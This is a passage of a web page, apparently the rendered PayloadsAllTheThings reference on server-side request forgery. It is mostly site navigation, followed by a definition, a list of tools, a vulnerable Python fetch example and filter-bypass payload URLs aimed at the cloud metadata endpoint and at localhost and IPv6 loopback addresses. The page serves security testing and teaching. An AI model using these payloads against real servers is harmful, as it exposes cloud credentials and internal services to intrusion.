Bypass Localhost with CIDR
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-rare-address" class="md-nav__link">
<span class="md-ellipsis">
Bypass Using Rare Address
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-an-encoded-ip-address" class="md-nav__link">
<span class="md-ellipsis">
Bypass Using an Encoded IP Address
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-different-encoding" class="md-nav__link">
<span class="md-ellipsis">
Bypass Using Different Encoding
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypassing-using-a-redirect" class="md-nav__link">
<span class="md-ellipsis">
Bypassing Using a Redirect
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-dns-rebinding" class="md-nav__link">
<span class="md-ellipsis">
Bypass Using DNS Rebinding
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-abusing-url-parsing-discrepancy" class="md-nav__link">
<span class="md-ellipsis">
Bypass Abusing URL Parsing Discrepancy
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-php-filter_var-function" class="md-nav__link">
<span class="md-ellipsis">
Bypass PHP filter_var() Function
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-jar-scheme" class="md-nav__link">
<span class="md-ellipsis">
Bypass Using JAR Scheme
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#exploitation-via-url-scheme" class="md-nav__link">
<span class="md-ellipsis">
Exploitation via URL Scheme
</span>
</a>
<nav class="md-nav" aria-label="Exploitation via URL Scheme">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#file" class="md-nav__link">
<span class="md-ellipsis">
File
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#http" class="md-nav__link">
<span class="md-ellipsis">
HTTP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#dict" class="md-nav__link">
<span class="md-ellipsis">
Dict
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#sftp" class="md-nav__link">
<span class="md-ellipsis">
SFTP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#tftp" class="md-nav__link">
<span class="md-ellipsis">
TFTP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ldap" class="md-nav__link">
<span class="md-ellipsis">
LDAP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#netdoc" class="md-nav__link">
<span class="md-ellipsis">
Netdoc
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#gopher" class="md-nav__link">
<span class="md-ellipsis">
Gopher
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#blind-exploitation" class="md-nav__link">
<span class="md-ellipsis">
Blind Exploitation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#upgrade-to-xss" class="md-nav__link">
<span class="md-ellipsis">
Upgrade to XSS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#labs" class="md-nav__link">
<span class="md-ellipsis">
Labs
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#references" class="md-nav__link">
<span class="md-ellipsis">
References
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="SSRF-Advanced-Exploitation/" class="md-nav__link">
<span class="md-ellipsis">
SSRF Advanced Exploitation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="SSRF-Cloud-Instances/" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for Cloud Instances
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_49" >
<label class="md-nav__link" for="__nav_49" id="__nav_49_label" tabindex="0">
<span class="md-ellipsis">
Server Side Template Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_49_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_49">
<span class="md-nav__icon md-icon"></span>
Server Side Template Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Server%20Side%20Template%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Server%20Side%20Template%20Injection/ASP/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - ASP.NET
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Server%20Side%20Template%20Injection/Java/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - Java
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Server%20Side%20Template%20Injection/JavaScript/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - JavaScript
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Server%20Side%20Template%20Injection/PHP/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - PHP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Server%20Side%20Template%20Injection/Python/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - Python
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Server%20Side%20Template%20Injection/Ruby/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - Ruby
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_50" >
<label class="md-nav__link" for="__nav_50" id="__nav_50_label" tabindex="0">
<span class="md-ellipsis">
Tabnabbing
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_50_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_50">
<span class="md-nav__icon md-icon"></span>
Tabnabbing
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Tabnabbing/" class="md-nav__link">
<span class="md-ellipsis">
Tabnabbing
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51" >
<label class="md-nav__link" for="__nav_51" id="__nav_51_label" tabindex="0">
<span class="md-ellipsis">
Type Juggling
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_51_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51">
<span class="md-nav__icon md-icon"></span>
Type Juggling
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Type%20Juggling/" class="md-nav__link">
<span class="md-ellipsis">
Type Juggling
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_52" >
<label class="md-nav__link" for="__nav_52" id="__nav_52_label" tabindex="0">
<span class="md-ellipsis">
Upload Insecure Files
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_52_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_52">
<span class="md-nav__icon md-icon"></span>
Upload Insecure Files
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/" class="md-nav__link">
<span class="md-ellipsis">
Upload Insecure Files
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_52_2" >
<label class="md-nav__link" for="__nav_52_2" id="__nav_52_2_label" tabindex="0">
<span class="md-ellipsis">
Configuration Apache .htaccess
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_52_2_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_52_2">
<span class="md-nav__icon md-icon"></span>
Configuration Apache .htaccess
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/Configuration%20Apache%20.htaccess/" class="md-nav__link">
<span class="md-ellipsis">
.htaccess
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_53" >
<label class="md-nav__link" for="__nav_53" id="__nav_53_label" tabindex="0">
<span class="md-ellipsis">
Web Cache Deception
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_53_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_53">
<span class="md-nav__icon md-icon"></span>
Web Cache Deception
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Web%20Cache%20Deception/" class="md-nav__link">
<span class="md-ellipsis">
Web Cache Deception
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_54" >
<label class="md-nav__link" for="__nav_54" id="__nav_54_label" tabindex="0">
<span class="md-ellipsis">
Web Sockets
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_54_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_54">
<span class="md-nav__icon md-icon"></span>
Web Sockets
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Web%20Sockets/" class="md-nav__link">
<span class="md-ellipsis">
Web Sockets
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_55" >
<label class="md-nav__link" for="__nav_55" id="__nav_55_label" tabindex="0">
<span class="md-ellipsis">
XPATH Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_55_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_55">
<span class="md-nav__icon md-icon"></span>
XPATH Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../XPATH%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XPATH Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_56" >
<label class="md-nav__link" for="__nav_56" id="__nav_56_label" tabindex="0">
<span class="md-ellipsis">
XSLT Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_56_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_56">
<span class="md-nav__icon md-icon"></span>
XSLT Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../XSLT%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XSLT Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_57" >
<label class="md-nav__link" for="__nav_57" id="__nav_57_label" tabindex="0">
<span class="md-ellipsis">
XSS Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_57_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_57">
<span class="md-nav__icon md-icon"></span>
XSS Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../XSS%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Cross Site Scripting
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../XSS%20Injection/1%20-%20XSS%20Filter%20Bypass/" class="md-nav__link">
<span class="md-ellipsis">
XSS Filter Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../XSS%20Injection/2%20-%20XSS%20Polyglot/" class="md-nav__link">
<span class="md-ellipsis">
Polyglot XSS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../XSS%20Injection/3%20-%20XSS%20Common%20WAF%20Bypass/" class="md-nav__link">
<span class="md-ellipsis">
Common WAF Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../XSS%20Injection/4%20-%20CSP%20Bypass/" class="md-nav__link">
<span class="md-ellipsis">
CSP Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../XSS%20Injection/5%20-%20XSS%20in%20Angular/" class="md-nav__link">
<span class="md-ellipsis">
XSS in Angular and AngularJS
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_58" >
<label class="md-nav__link" for="__nav_58" id="__nav_58_label" tabindex="0">
<span class="md-ellipsis">
XXE Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_58_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_58">
<span class="md-nav__icon md-icon"></span>
XXE Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../XXE%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XML External Entity
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_59" >
<label class="md-nav__link" for="__nav_59" id="__nav_59_label" tabindex="0">
<span class="md-ellipsis">
Zip Slip
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_59_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_59">
<span class="md-nav__icon md-icon"></span>
Zip Slip
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Zip%20Slip/" class="md-nav__link">
<span class="md-ellipsis">
Zip Slip
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_60" >
<label class="md-nav__link" for="__nav_60" id="__nav_60_label" tabindex="0">
<span class="md-ellipsis">
LEARNING AND SOCIALS
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_60_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_60">
<span class="md-nav__icon md-icon"></span>
LEARNING AND SOCIALS
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../_LEARNING_AND_SOCIALS/BOOKS/" class="md-nav__link">
<span class="md-ellipsis">
Books
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../_LEARNING_AND_SOCIALS/TWITTER/" class="md-nav__link">
<span class="md-ellipsis">
Twitter
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../_LEARNING_AND_SOCIALS/YOUTUBE/" class="md-nav__link">
<span class="md-ellipsis">
Youtube
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_61" >
<label class="md-nav__link" for="__nav_61" id="__nav_61_label" tabindex="0">
<span class="md-ellipsis">
template vuln
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_61_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_61">
<span class="md-nav__icon md-icon"></span>
template vuln
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../_template_vuln/" class="md-nav__link">
<span class="md-ellipsis">
Vulnerability Title
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
Table of contents
</label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
<li class="md-nav__item">
<a href="#summary" class="md-nav__link">
<span class="md-ellipsis">
Summary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#tools" class="md-nav__link">
<span class="md-ellipsis">
Tools
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#methodology" class="md-nav__link">
<span class="md-ellipsis">
Methodology
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypassing-filters" class="md-nav__link">
<span class="md-ellipsis">
Bypassing Filters
</span>
</a>
<nav class="md-nav" aria-label="Bypassing Filters">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#default-targets" class="md-nav__link">
<span class="md-ellipsis">
Default Targets
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-localhost-with-ipv6-notation" class="md-nav__link">
<span class="md-ellipsis">
Bypass Localhost with IPv6 Notation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-localhost-with-a-domain-redirect" class="md-nav__link">
<span class="md-ellipsis">
Bypass Localhost with a Domain Redirect
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-localhost-with-cidr" class="md-nav__link">
<span class="md-ellipsis">
Bypass Localhost with CIDR
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-rare-address" class="md-nav__link">
<span class="md-ellipsis">
Bypass Using Rare Address
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-an-encoded-ip-address" class="md-nav__link">
<span class="md-ellipsis">
Bypass Using an Encoded IP Address
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-different-encoding" class="md-nav__link">
<span class="md-ellipsis">
Bypass Using Different Encoding
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypassing-using-a-redirect" class="md-nav__link">
<span class="md-ellipsis">
Bypassing Using a Redirect
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-dns-rebinding" class="md-nav__link">
<span class="md-ellipsis">
Bypass Using DNS Rebinding
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-abusing-url-parsing-discrepancy" class="md-nav__link">
<span class="md-ellipsis">
Bypass Abusing URL Parsing Discrepancy
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-php-filter_var-function" class="md-nav__link">
<span class="md-ellipsis">
Bypass PHP filter_var() Function
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-jar-scheme" class="md-nav__link">
<span class="md-ellipsis">
Bypass Using JAR Scheme
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#exploitation-via-url-scheme" class="md-nav__link">
<span class="md-ellipsis">
Exploitation via URL Scheme
</span>
</a>
<nav class="md-nav" aria-label="Exploitation via URL Scheme">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#file" class="md-nav__link">
<span class="md-ellipsis">
File
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#http" class="md-nav__link">
<span class="md-ellipsis">
HTTP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#dict" class="md-nav__link">
<span class="md-ellipsis">
Dict
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#sftp" class="md-nav__link">
<span class="md-ellipsis">
SFTP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#tftp" class="md-nav__link">
<span class="md-ellipsis">
TFTP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ldap" class="md-nav__link">
<span class="md-ellipsis">
LDAP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#netdoc" class="md-nav__link">
<span class="md-ellipsis">
Netdoc
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#gopher" class="md-nav__link">
<span class="md-ellipsis">
Gopher
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#blind-exploitation" class="md-nav__link">
<span class="md-ellipsis">
Blind Exploitation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#upgrade-to-xss" class="md-nav__link">
<span class="md-ellipsis">
Upgrade to XSS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#labs" class="md-nav__link">
<span class="md-ellipsis">
Labs
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#references" class="md-nav__link">
<span class="md-ellipsis">
References
</span>
</a>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-content" data-md-component="content">
<article class="md-content__inner md-typeset">
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server Side Request Forgery/README.md" title="Edit this page" class="md-content__button md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M10 20H6V4h7v5h5v3.1l2-2V8l-6-6H6c-1.1 0-2 .9-2 2v16c0 1.1.9 2 2 2h4zm10.2-7c.1 0 .3.1.4.2l1.3 1.3c.2.2.2.6 0 .8l-1 1-2.1-2.1 1-1c.1-.1.2-.2.4-.2m0 3.9L14.1 23H12v-2.1l6.1-6.1z"/></svg>
</a>
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/Server Side Request Forgery/README.md" title="View source of this page" class="md-content__button md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M17 18c.56 0 1 .44 1 1s-.44 1-1 1-1-.44-1-1 .44-1 1-1m0-3c-2.73 0-5.06 1.66-6 4 .94 2.34 3.27 4 6 4s5.06-1.66 6-4c-.94-2.34-3.27-4-6-4m0 6.5a2.5 2.5 0 0 1-2.5-2.5 2.5 2.5 0 0 1 2.5-2.5 2.5 2.5 0 0 1 2.5 2.5 2.5 2.5 0 0 1-2.5 2.5M9.27 20H6V4h7v5h5v4.07c.7.08 1.36.25 2 .49V8l-6-6H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h4.5a8.2 8.2 0 0 1-1.23-2"/></svg>
</a>
<h1 id="server-side-request-forgery">Server-Side Request Forgery</h1>
<blockquote>
<p>Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.</p>
</blockquote>
<h2 id="summary">Summary</h2>
<ul>
<li><a href="#tools">Tools</a></li>
<li><a href="#methodology">Methodology</a></li>
<li><a href="#bypassing-filters">Bypassing Filters</a><ul>
<li><a href="#default-targets">Default Targets</a></li>
<li><a href="#bypass-localhost-with-ipv6-notation">Bypass Localhost with IPv6 Notation</a></li>
<li><a href="#bypass-localhost-with-a-domain-redirect">Bypass Localhost with a Domain Redirect</a></li>
<li><a href="#bypass-localhost-with-cidr">Bypass Localhost with CIDR</a></li>
<li><a href="#bypass-using-rare-address">Bypass Using Rare Address</a></li>
<li><a href="#bypass-using-an-encoded-ip-address">Bypass Using an Encoded IP Address</a></li>
<li><a href="#bypass-using-different-encoding">Bypass Using Different Encoding</a></li>
<li><a href="#bypassing-using-a-redirect">Bypassing Using a Redirect</a></li>
<li><a href="#bypass-using-dns-rebinding">Bypass Using DNS Rebinding</a></li>
<li><a href="#bypass-abusing-url-parsing-discrepancy">Bypass Abusing URL Parsing Discrepancy</a></li>
<li><a href="#bypass-php-filter_var-function">Bypass PHP filter_var() Function</a></li>
<li><a href="#bypass-using-jar-scheme">Bypass Using JAR Scheme</a></li>
</ul>
</li>
<li><a href="#exploitation-via-url-scheme">Exploitation via URL Scheme</a><ul>
<li><a href="#file">file://</a></li>
<li><a href="#http">http://</a></li>
<li><a href="#dict">dict://</a></li>
<li><a href="#sftp">sftp://</a></li>
<li><a href="#tftp">tftp://</a></li>
<li><a href="#ldap">ldap://</a></li>
<li><a href="#gopher">gopher://</a></li>
<li><a href="#netdoc">netdoc://</a></li>
</ul>
</li>
<li><a href="#blind-exploitation">Blind Exploitation</a></li>
<li><a href="#upgrade-to-xss">Upgrade to XSS</a></li>
<li><a href="#labs">Labs</a> </li>
<li><a href="#references">References</a></li>
</ul>
<h2 id="tools">Tools</h2>
<ul>
<li><a href="https://github.com/swisskyrepo/SSRFmap">swisskyrepo/SSRFmap</a> - Automatic SSRF fuzzer and exploitation tool</li>
<li><a href="https://github.com/tarunkant/Gopherus">tarunkant/Gopherus</a> - Generates gopher link for exploiting SSRF and gaining RCE in various servers</li>
<li><a href="https://github.com/In3tinct/See-SURF">In3tinct/See-SURF</a> - Python based scanner to find potential SSRF parameters</li>
<li><a href="https://github.com/teknogeek/ssrf-sheriff">teknogeek/SSRF-Sheriff</a> - Simple SSRF-testing sheriff written in Go</li>
<li><a href="https://github.com/assetnote/surf">assetnote/surf</a> - Returns a list of viable SSRF candidates</li>
<li><a href="https://github.com/dwisiswant0/ipfuscator">dwisiswant0/ipfuscator</a> - A blazing-fast, thread-safe, straightforward and zero memory allocations tool to swiftly generate alternative IP(v4) address representations in Go.</li>
<li><a href="https://github.com/Horlad/r3dir">Horlad/r3dir</a> - a redirection service designed to help bypass SSRF filters that do not validate the redirect location. Intergrated with Burp with help of Hackvertor tags</li>
</ul>
<h2 id="methodology">Methodology</h2>
<p>SSRF is a security vulnerability that occurs when an attacker manipulates a server to make HTTP requests to an unintended location. This happens when the server processes user-provided URLs or IP addresses without proper validation.</p>
<p>Common exploitation paths:</p>
<ul>
<li>Accessing Cloud metadata</li>
<li>Leaking files on the server</li>
<li>Network discovery, port scanning with the SSRF</li>
<li>Sending packets to specific services on the network, usually to achieve a Remote Command Execution on another server</li>
</ul>
<p><strong>Example</strong>: A server accepts user input to fetch a URL.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-0-1" name="__codelineno-0-1" href="#__codelineno-0-1"></a><span class="n">url</span> <span class="o">=</span> <span class="nb">input</span><span class="p">(</span><span class="s2">&quot;Enter URL:&quot;</span><span class="p">)</span>
<a id="__codelineno-0-2" name="__codelineno-0-2" href="#__codelineno-0-2"></a><span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">url</span><span class="p">)</span>
<a id="__codelineno-0-3" name="__codelineno-0-3" href="#__codelineno-0-3"></a><span class="k">return</span> <span class="n">response</span>
</code></pre></div>
<p>An attacker supplies a malicious input:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-1-1" name="__codelineno-1-1" href="#__codelineno-1-1"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span>
</code></pre></div>
<p>This fetches sensitive information from the AWS EC2 metadata service.</p>
<h2 id="bypassing-filters">Bypassing Filters</h2>
<h3 id="default-targets">Default Targets</h3>
<p>By default, Server-Side Request Forgery are used to access services hosted on <code>localhost</code> or hidden further on the network.</p>
<ul>
<li>Using <code>localhost</code>
<div class="highlight"><pre><span></span><code><a id="__codelineno-2-1" name="__codelineno-2-1" href="#__codelineno-2-1"></a><span class="n">http</span><span class="p">://</span><span class="n">localhost</span><span class="p">:</span><span class="n">80</span>
<a id="__codelineno-2-2" name="__codelineno-2-2" href="#__codelineno-2-2"></a><span class="n">http</span><span class="p">://</span><span class="n">localhost</span><span class="p">:</span><span class="n">22</span>
<a id="__codelineno-2-3" name="__codelineno-2-3" href="#__codelineno-2-3"></a><span class="n">https</span><span class="p">://</span><span class="n">localhost</span><span class="p">:</span><span class="n">443</span>
</code></pre></div></li>
<li>Using <code>127.0.0.1</code>
<div class="highlight"><pre><span></span><code><a id="__codelineno-3-1" name="__codelineno-3-1" href="#__codelineno-3-1"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">80</span>
<a id="__codelineno-3-2" name="__codelineno-3-2" href="#__codelineno-3-2"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">22</span>
<a id="__codelineno-3-3" name="__codelineno-3-3" href="#__codelineno-3-3"></a><span class="n">https</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">443</span>
</code></pre></div></li>
<li>Using <code>0.0.0.0</code>
<div class="highlight"><pre><span></span><code><a id="__codelineno-4-1" name="__codelineno-4-1" href="#__codelineno-4-1"></a><span class="n">http</span><span class="p">://</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">:</span><span class="n">80</span>
<a id="__codelineno-4-2" name="__codelineno-4-2" href="#__codelineno-4-2"></a><span class="n">http</span><span class="p">://</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">:</span><span class="n">22</span>
<a id="__codelineno-4-3" name="__codelineno-4-3" href="#__codelineno-4-3"></a><span class="n">https</span><span class="p">://</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">:</span><span class="n">443</span>
</code></pre></div></li>
</ul>
<h3 id="bypass-localhost-with-ipv6-notation">Bypass Localhost with IPv6 Notation</h3>
<ul>
<li>
<p>Using unspecified address in IPv6 <code>[::]</code>
<div class="highlight"><pre><span></span><code><a id="__codelineno-5-1" name="__codelineno-5-1" href="#__codelineno-5-1"></a><span class="n">http</span><span class="p">://[::]:</span><span class="n">80</span><span class="p">/</span>
</code></pre></div></p>
</li>
<li>
<p>Using IPv6 loopback addres<code>[0000::1]</code>
<div class="highlight"><pre><span></span><code><a id="__codelineno-6-1" name="__codelineno-6-1" href="#__codelineno-6-1"></a><span class="n">http</span><span class="p">://[</span><span class="n">0000</span><span class="p">::</span><span class="n">1</span><span class="p">]:</span><span class="n">80</span><span class="p">/</span>
